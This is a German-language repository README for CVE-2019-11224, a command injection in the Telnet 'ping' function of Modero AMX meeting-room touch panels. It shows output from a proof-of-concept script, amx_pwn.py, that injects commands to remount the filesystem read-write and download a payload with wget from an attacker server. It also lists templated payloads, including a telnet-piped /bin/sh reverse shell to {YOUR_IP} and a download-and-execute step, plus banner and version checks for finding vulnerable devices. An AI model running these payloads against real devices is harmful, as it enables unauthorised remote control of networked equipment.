
Modero AMX Codeausführung (CVE-2019–11224)
Dieses Repository enthält einige Quellen zu CVE-2019–11224 (https://link.medium.com/zukA0oCnV8), da mir aufgefallen ist, dass der Link auf der offiziellen NIST-Website nicht mehr funktioniert.
Modero AMX-Geräte sind im Wesentlichen Touchpanel-Geräte für Besprechungsräume. Sie sind in vielen verschiedenen Umgebungen zu finden und haben in der Regel Telnet geöffnet.
Da sie über Telnet eine weniger als ideale Konsole emulieren, existiert eine Code-Injection-Schwachstelle über die "ping"-Funktion durch die Verwendung von Befehlstrennzeichen.
Seit ich dieses GitHub-Repo ursprünglich erstellt und an AMX-Geräten herumgebastelt habe, habe ich einen POC und einen Exploit-Prozess entwickelt, um mit dieser Schwachstelle Reverse Shells zu erhalten. Hoffentlich bereitet es dir Freude :)
Ich habe einen POC amx_pwn.py geschrieben, der hilfreich sein sollte. Beispielausgabe unten:
┌──(cozyfox㉿submarine)-[/CVE-2019-11224]
└─$ python3 amx_pwn.py -t 192.168.0.21 -fs 192.168.0.41 -fn something.jpg -v 1
[!] Your current settings are:
[*] Target: 192.168.0.21
[*] FileServer and Filename URL: http://192.168.0.41/something.jpg
[*] Verbosity: 1
(^_^)7 Continue? (Y/N): y
[*] RUNNING
Telnet(192.168.0.21,23): recv b'\xff\xfb\x01\r\nWelcome to Modero v2.86.50 Copyright (C) AMX '
Telnet(192.168.0.21,23): IAC WILL 1
Telnet(192.168.0.21,23): recv b'LLC 2002-2009\r\n>'
b'\r\nWelcome to Modero v2.86.50 Copyright (C) AMX LLC 2002-2009\r\n>'
Telnet(192.168.0.21,23): send b"ping ;CMD=$'\\x20-o\\x20remount,rw\\x20/'&&mount$CMD\r\n"
Telnet(192.168.0.21,23): recv b'\xff\xfc\x01'
Telnet(192.168.0.21,23): IAC WONT 1
<..cut to remove clutter...>
Telnet(192.168.0.21,23): recv b'\xff\xfc\x01'
Telnet(192.168.0.21,23): IAC WONT 1
taking a snooze
Telnet(192.168.0.21,23): send b"ping ;CMD=$'\\x20http://192.168.0.41/something.jpg'&&wget$CMD\r\n"
taking a snooze
...
ping ;CMD=$'\x20-o\x20remount,rw\x20/'&&mount$CMDtelnet {YOUR_IP} 1332 | /bin/sh | telnet {YOUR_IP} 1333ping ;CMD=$'\x20http://{YOUR_SYSTEM}/{YOUR_FILE}'&&wget$CMDping ;CMD=$'\x20{YOUR_FILE}'&&/bin/sh$CMDAchten Sie auf Telnet-Banner (normalerweise Port 23) mit folgendem Inhalt:
Welcome to Modero: oder Copyright (C) AMX LLC. Suchen Sie nach Versionen vor 2.87.13